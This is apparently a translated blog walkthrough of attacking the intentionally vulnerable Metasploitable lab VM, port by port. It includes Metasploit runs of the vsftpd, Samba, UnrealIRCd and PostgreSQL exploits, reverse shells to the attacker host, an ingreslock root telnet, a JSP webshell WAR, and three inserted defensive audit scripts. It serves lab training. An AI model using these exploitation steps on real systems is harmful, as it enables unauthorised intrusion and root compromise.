Start the VM and put it in NAT mode.
Run an nmap sweep of the subnet to find the target; its address is 192.168.74.130.
# Information gathering
# Nmap
Run a full-port scan:
```
C:\WINDOWS\system32>nmap -p- 192.168.74.130
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-03 12:35 中国标准时间
Nmap scan report for bogon (192.168.74.130)
Host is up (0.0027s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  ircs-u
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  msgsrvr
33203/tcp open  unknown
36262/tcp open  unknown
46103/tcp open  unknown
60596/tcp open  unknown
MAC Address: 00:0C:29:B0:8E:3D (VMware)
Nmap done: 1 IP address (1 host up) scanned in 10.59 seconds
```
Now go through the ports one by one.
# Exploitation
# FTP
Scan the FTP port for service details:
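Before going port by port, here is an added example (my own code, not from the original post) of how a defender would triage a scan like the one above: it parses nmap's normal output and flags the legacy cleartext services and the known backdoor ports that show up on this host. The sample text is a constructed subset of the scan output, plus one constructed line (6200/tcp) that is not in the real scan, added only to exercise the backdoor check; the category labels are my own.

```python
import re

# Constructed sample: a subset of the `nmap -p-` output above, plus one line
# (6200/tcp) that is NOT in the real scan, added to exercise the backdoor check.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for bogon (192.168.74.130)
Host is up (0.0027s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1524/tcp  open  ingreslock
2049/tcp  open  nfs
6200/tcp  open  unknown
"""

# Triage labels are my own (assumption); nmap itself only reports the service name.
LEGACY_CLEARTEXT = {"ftp", "telnet", "exec", "login", "shell"}
BACKDOOR_PORTS = {
    1524: "ingreslock root shell (no authentication)",
    6200: "vsftpd 2.3.4 backdoor listener",
}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap_ports(text):
    """Parse nmap's normal output into (port, proto, state, service) tuples."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return ports


def triage(ports):
    """Map each open port to a finding string; ports we do not flag are omitted."""
    findings = {}
    for port, _proto, state, service in ports:
        if state != "open":
            continue
        if port in BACKDOOR_PORTS:
            findings[port] = BACKDOOR_PORTS[port]
        elif service in LEGACY_CLEARTEXT:
            findings[port] = f"legacy cleartext service: {service}"
        elif service == "nfs":
            findings[port] = "NFS exported: review /etc/exports for wildcard hosts"
    return findings


if __name__ == "__main__":
    for port, note in sorted(triage(parse_nmap_ports(SAMPLE_NMAP_OUTPUT)).items()):
        print(f"{port:>5}/tcp  {note}")
```

Feed it the saved output of `nmap -p-` (normal format, not XML) and it prints one line per flagged port; services it has no rule for, such as ssh, are left out so the list stays short.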
```
C:\WINDOWS\system32>nmap -sV -p 21 192.168.74.130
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-03 12:39 中国标准时间
Nmap scan report for bogon (192.168.74.130)
Host is up (0.00013s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
MAC Address: 00:0C:29:B0:8E:3D (VMware)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
```
The version is vsftpd 2.3.4; search for known vulnerabilities:
```
msf6 > search name:ftp version:2.3.4 type:exploit platform:unix
Matching Modules
================
   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/netwin_surgeftp_exec   2012-12-06       good       Yes    Netwin SurgeFTP Remote Command Execution
   1  exploit/unix/ftp/proftpd_modcopy_exec     2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution
   2  exploit/unix/ftp/proftpd_133c_backdoor    2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution
   3  exploit/unix/ftp/vsftpd_234_backdoor      2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
   4  exploit/unix/http/tnftp_savefile          2014-10-28       excellent  No     tnftp "savefile" Arbitrary Command Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/unix/http/tnftp_savefile
```
Entry 3 shows that version 2.3.4 has a backdoor; exploit it:
```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.74.130
RHOSTS => 192.168.74.130
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.74.130:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.74.130:21 - USER: 331 Please specify the password.
[+] 192.168.74.130:21 - Backdoor service has been spawned, handling...
[+] 192.168.74.130:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.74.1:15165 -> 192.168.74.130:6200) at 2024-04-03 12:41:47 +0800
whoami
root
```
We have root.
Use the python on the target to get an interactive shell:
```
python -c 'import pty; pty.spawn("/bin/bash")'
root@metasploitable:/# whoami
whoami
root
```
This command uses Python to spawn an interactive Bash shell inside the current terminal session. Breakdown:

- `python`: starts the Python interpreter.
- `-c 'import pty; pty.spawn("/bin/bash")'`: a Python statement passed as an argument to the interpreter, where:
  - `import pty` imports Python's `pty` module, which provides pseudo-terminal functionality.
  - `pty.spawn("/bin/bash")` uses `pty.spawn()` to start a new Bash shell (`/bin/bash`) attached to the current terminal, giving an interactive Bash shell in which you can run commands and interact with the system.

Running this command therefore gives you an interactive Bash shell in the current session that behaves like a normal terminal.
This backdoor is triggered at FTP login: if the username ends with `:)` (a smiley), a backdoor listener is opened automatically on port 6200, through which the host can be controlled.
# SSH
SSH would have to be brute-forced. I don't have a good wordlist and can't be bothered; just a mention that hydra, Ladon and Metasploit can all do it.
Suppose we had cracked the credentials msfadmin/msfadmin. Log in with msf:
```
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > search ssh_login
Matching Modules
================
   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.74.130
RHOSTS => 192.168.74.130
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME msfadmin
USERNAME => msfadmin
msf6 auxiliary(scanner/ssh/ssh_login) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.74.130:22 - Starting bruteforce
[+] 192.168.74.130:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 3 opened (192.168.74.1:20470 -> 192.168.74.130:22) at 2024-04-03 13:32:45 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
That gave us session 3. Check whether we can escalate privileges:
```
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 3
SESSION => 3
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.74.130 - Collecting local exploits for linux...
[-] 192.168.74.130 - No suggestions available.
[*] Post module execution completed
```
No escalation route was suggested. Manual privilege escalation is possible and there are plenty of methods; I'll try that later.
# telnet
Same story: brute force, no wordlist, can't be bothered. The attack is the same idea: low-privilege shell plus privilege escalation.
# samba
Probe the Samba version:
```
C:\WINDOWS\system32>nmap -p 445 -sV 192.168.74.130
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-03 13:40 中国标准时间
Nmap scan report for bogon (192.168.74.130)
Host is up (0.00s latency).
PORT    STATE SERVICE     VERSION
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:B0:8E:3D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.27 seconds
```
Hit it with the usual module:
```
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] Command shell session 4 opened (192.168.74.1:4444 -> 192.168.74.130:34760) at 2024-04-03 13:41:47 +0800
whoami
root
```
Besides that, anonymous SMB access lets you browse directories.
# 512, 513, 514
These belong to one protocol family (the r-services). I tried logging in and found it asked for a password, so it's back to brute forcing again. But reading other people's write-ups, the target machine apparently has `+ +` configured, so every machine is treated as a friendly and you can connect with no password at all. I couldn't connect though, and I don't quite get why. In theory, rlogin and rsh from Kali should connect without a password.
# 2049 NFS
The target has NFS enabled and allows access to its file system, so we can generate an SSH key pair, mount the target's file system, write the public key into root's home on the target, and then log straight in as root.
Access to the machine was flaky; writing the SSH key errored out for some reason. Will revisit later.
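Both the NFS key-injection route described here and the password-less rlogin/rsh route in the 512/513/514 section above rest on server-side trust settings that are easy to audit. As an added example (my own code, not from the original post), the Python below parses an `/etc/exports` file and an rhosts-style trust file (`hosts.equiv` or `~/.rhosts`) and reports the entries that make those routes possible: wildcard clients, `no_root_squash`, a read-write export of `/`, and `+` wildcards in the trust file. Both inputs are constructed samples and the finding labels are my own.

```python
# Constructed sample /etc/exports: the first export is the kind that lets any
# client mount / and write as root; the second is a sane one for contrast.
SAMPLE_EXPORTS = """\
# NFS exports (constructed sample)
/      *(rw,sync,no_root_squash)
/home  192.168.74.0/24(ro,sync,root_squash)
"""

# Constructed sample of an rhosts-style trust file (hosts.equiv or ~/.rhosts).
SAMPLE_RHOSTS = """\
+ +
buildbox.example.internal alice
"""


def _strip_comment(raw):
    return raw.split("#", 1)[0].strip()


def audit_exports(text):
    """Return (path, client, reason) for risky entries in an /etc/exports file."""
    findings = []
    for raw in text.splitlines():
        line = _strip_comment(raw)
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:]
        if not clients:
            # A bare path with no client list is exported to everyone.
            findings.append((path, "*", "no client list: exported to every host"))
            continue
        for client in clients:
            host, _, opts = client.partition("(")
            host = host or "*"          # "(rw)" with no host also means any host
            options = set(opts.rstrip(")").split(",")) if opts else set()
            if host == "*":
                findings.append((path, host, "wildcard client: any host may mount"))
            if "no_root_squash" in options:
                findings.append((path, host, "no_root_squash: remote root writes as uid 0"))
            if "rw" in options and path == "/":
                findings.append((path, host, "root filesystem exported read-write"))
    return findings


def audit_rhosts(text):
    """Return (entry, reason) for '+' wildcards in hosts.equiv / .rhosts.

    '+' in the host field trusts every host; '+ +' trusts every host and every
    user, so rlogin/rsh succeed with no password at all.
    """
    findings = []
    for raw in text.splitlines():
        line = _strip_comment(raw)
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+":
            reason = "any host trusted" + (", any user" if user == "+" else "")
            findings.append((line, reason))
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print("exports:", finding)
    for finding in audit_rhosts(SAMPLE_RHOSTS):
        print("rhosts: ", finding)
```

Run it over the real files on a host (`audit_exports(open("/etc/exports").read())`) and an empty result is what you want to see; the sane `/home` export in the sample produces no finding, the `/` export produces three.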
# Port 1524 ingreslock backdoor
This database service listens on port 1524 and has a backdoor: just telnet to it and you have control.
```
┌──(root㉿kali)-[~/Desktop]
└─# telnet 192.168.74.130 1524
Trying 192.168.74.130...
Connected to 192.168.74.130.
Escape character is '^]'.
root@metasploitable:/# whoami
root
root@metasploitable:/#
```
# 1099 java-rmi service
Java RMI Server Insecure Default Configuration Java Code Execution
Reference: https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server/
Just exploit it:
```
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show targets
...targets...
msf exploit(java_rmi_server) > set TARGET < target-id >
msf exploit(java_rmi_server) > show options
...show and set options...
msf exploit(java_rmi_server) > exploit
```
Straight to root.
# 3306 database
Brute-force the database credentials, the same old story.
# 3632 distcc
Find the exploit module in msf and use it:
```
use exploit/unix/misc/distcc_exec
show options
set rhosts 192.168.74.130
run
```
This failed for me again: `Exploit failed: Errno::ECONNRESET An existing connection was forcibly closed by the remote host.`
The connection was closed by the remote host, reason unknown.
# 5432 postgresql service
On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory and may also load UDF shared libraries from there, which allows arbitrary code execution. The module compiles a Linux shared object, uploads it to the target host by binary injection through the UPDATE pg_largeobject method, and creates a UDF (user-defined function) from that shared object. Because the payload runs as the shared object's constructor, it does not need to conform to a specific Postgres API version.
```
msf6 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.130:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/yYyZrGxw.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.74.130
[*] Meterpreter session 6 opened (192.168.74.1:4444 -> 192.168.74.130:41863) at 2024-04-03 14:49:51 +0800
meterpreter >
```
# 5900 vnc
The VNC service is up and can be brute-forced, but! nothing comes out of the brute force. This VNC
# 6697, 6667 backdoor
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. The backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12, 2010.
```
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.74.130
RHOSTS => 192.168.74.130
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[-] 192.168.74.130:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
```
The attack failed because no suitable payload had been selected. Set one manually:
```
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.74.1
LHOST => 192.168.74.1
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.130:6667 - Connected to 192.168.74.130:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] 192.168.74.130:6667 - Sending backdoor command...
[*] Command shell session 7 opened (192.168.74.1:4444 -> 192.168.74.130:52367) at 2024-04-03 15:11:29 +0800
whoami
root
```
# Port 80
Scan for sensitive directories with dirsearch:
```
D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.130
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.130\_24-04-03_15-41-05.txt
Target: http://192.168.74.130/
[15:41:05] Starting:
[15:41:10] 403 -  298B - /.ht_wsr.txt
[15:41:10] 403 -  301B - /.htaccess.bak1
[15:41:10] 403 -  301B - /.htaccess.orig
[15:41:10] 403 -  302B - /.htaccess_extra
[15:41:10] 403 -  303B - /.htaccess.sample
[15:41:10] 403 -  301B - /.htaccess.save
[15:41:11] 403 -  301B - /.htaccess_orig
[15:41:11] 403 -  299B - /.htaccess_sc
[15:41:11] 403 -  299B - /.htaccessBAK
[15:41:11] 403 -  299B - /.htaccessOLD
[15:41:11] 403 -  300B - /.htaccessOLD2
[15:41:11] 403 -  291B - /.htm
[15:41:11] 403 -  292B - /.html
[15:41:11] 403 -  297B - /.htpasswds
[15:41:11] 403 -  301B - /.htpasswd_test
[15:41:11] 403 -  298B - /.httr-oauth
[15:41:52] 403 -  295B - /cgi-bin/
[15:42:04] 200 -  112KB - /doc/
[15:42:05] 302 -    0B - /dvwa/  ->  login.php
[15:42:37] 200 -   24KB - /mutillidae/
[15:42:46] 200 -   49KB - /phpinfo.php
[15:42:46] 200 -   49KB - /phpinfo
[15:42:47] 301 -  326B - /phpMyAdmin  ->  http://192.168.74.130/phpMyAdmin/
[15:42:50] 200 -    4KB - /phpMyAdmin/
[15:42:50] 200 -    3KB - /phpMyAdmin/index.php
[15:43:19] 301 -  320B - /test  ->  http://192.168.74.130/test/
[15:43:20] 200 -  885B - /test/
[15:43:21] 301 -  324B - /tikiwiki  ->  http://192.168.74.130/tikiwiki/
Task Completed
```
There is a `/doc/` directory; directory listing is on and it spills everything.
There is also a `dvwa` practice target.
`tikiwiki` is vulnerable; I attacked it earlier without success, because the encoder didn't fit (my guess).
I don't know what `test` is.
`phpinfo` shows it is an Apache site with CGI enabled. Time to bring out the tool for that:
```
msf > use exploit/multi/http/php_cgi_arg_injection
```
It pops a meterpreter straight away.
I'll leave the web side there for now and come back to it when I have time.
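The dirsearch report above is the kind of output a defender also wants to read systematically rather than by eye. As an added example (my own code, not from the original post or the dirsearch project), the Python below parses dirsearch's result lines, groups them by HTTP status, and lists the reachable paths that match a small set of sensitive patterns (phpinfo, phpMyAdmin, the listable `/doc/` directory). The sample is a constructed subset of the report above, and the pattern list and its reasons are my own.

```python
import re
from collections import defaultdict

# Constructed subset of the dirsearch output above (a few lines, not the full report).
SAMPLE_DIRSEARCH = """\
[15:41:10] 403 -  298B - /.ht_wsr.txt
[15:41:52] 403 -  295B - /cgi-bin/
[15:42:04] 200 -  112KB - /doc/
[15:42:05] 302 -    0B - /dvwa/  ->  login.php
[15:42:46] 200 -   49KB - /phpinfo.php
[15:42:50] 200 -    4KB - /phpMyAdmin/
[15:43:21] 301 -  324B - /tikiwiki  ->  http://192.168.74.130/tikiwiki/
"""

# "[HH:MM:SS] <status> - <size> - <path> [ -> <redirect>]"
RESULT_LINE = re.compile(
    r"^\[\d\d:\d\d:\d\d\]\s+(\d{3})\s+-\s+(\S+)\s+-\s+(\S+)(?:\s+->\s+(\S+))?"
)

# My own triage patterns (assumption): path fragment -> why it matters.
SENSITIVE = {
    "phpinfo": "leaks PHP/Apache configuration and filesystem paths",
    "phpmyadmin": "database admin UI reachable from the network",
    "/doc/": "directory listing enabled",
}


def parse_dirsearch(text):
    """Parse dirsearch result lines into dicts; non-result lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = RESULT_LINE.match(line)
        if m:
            rows.append({
                "status": int(m.group(1)),
                "size": m.group(2),
                "path": m.group(3),
                "redirect": m.group(4),   # None unless dirsearch printed "->"
            })
    return rows


def by_status(rows):
    """Group paths by HTTP status so 403s (exists, blocked) and 200s stand apart."""
    groups = defaultdict(list)
    for r in rows:
        groups[r["status"]].append(r["path"])
    return dict(groups)


def exposures(rows):
    """Return {path: reason} for 2xx paths matching a sensitive pattern."""
    out = {}
    for r in rows:
        if not 200 <= r["status"] < 300:
            continue
        low = r["path"].lower()
        for fragment, reason in SENSITIVE.items():
            if fragment.lower() in low:
                out[r["path"]] = reason
                break
    return out


if __name__ == "__main__":
    rows = parse_dirsearch(SAMPLE_DIRSEARCH)
    for status, paths in sorted(by_status(rows).items()):
        print(status, paths)
    for path, reason in exposures(rows).items():
        print("EXPOSED", path, "-", reason)
```

Point it at the report file dirsearch writes (the `Output File` path in the banner above) and the `exposures()` list is the short version of what the author found by reading the scan: the listable `/doc/`, `phpinfo`, and `phpMyAdmin` are reachable, while the 403 `.htaccess` variants merely confirm the files exist behind Apache's deny rules.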
# 8009 ajp
There is a Tomcat file inclusion vulnerability.
Tool: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/
Note that this tool needs a Python 2 environment.
# 8180 Tomcat
Build a WAR and upload it. Damn it, I built it and uploaded it and it doesn't get parsed. Frustrating.
I packed a JSP webshell straight into a WAR:
```
D:\Desktop\1111>jar -cvf 222.war .\
已添加清单
正在添加: 111.jsp(输入 = 855) (输出 = 494)(压缩了 42%)
```
antsword can't connect to it either, damn.
# Summary
Mainly used Metasploit's attack modules.
Some attacks failed for reasons I don't know; if you know why, leave me a comment, please!
If there are other attack methods, remember to @ me.
So tired.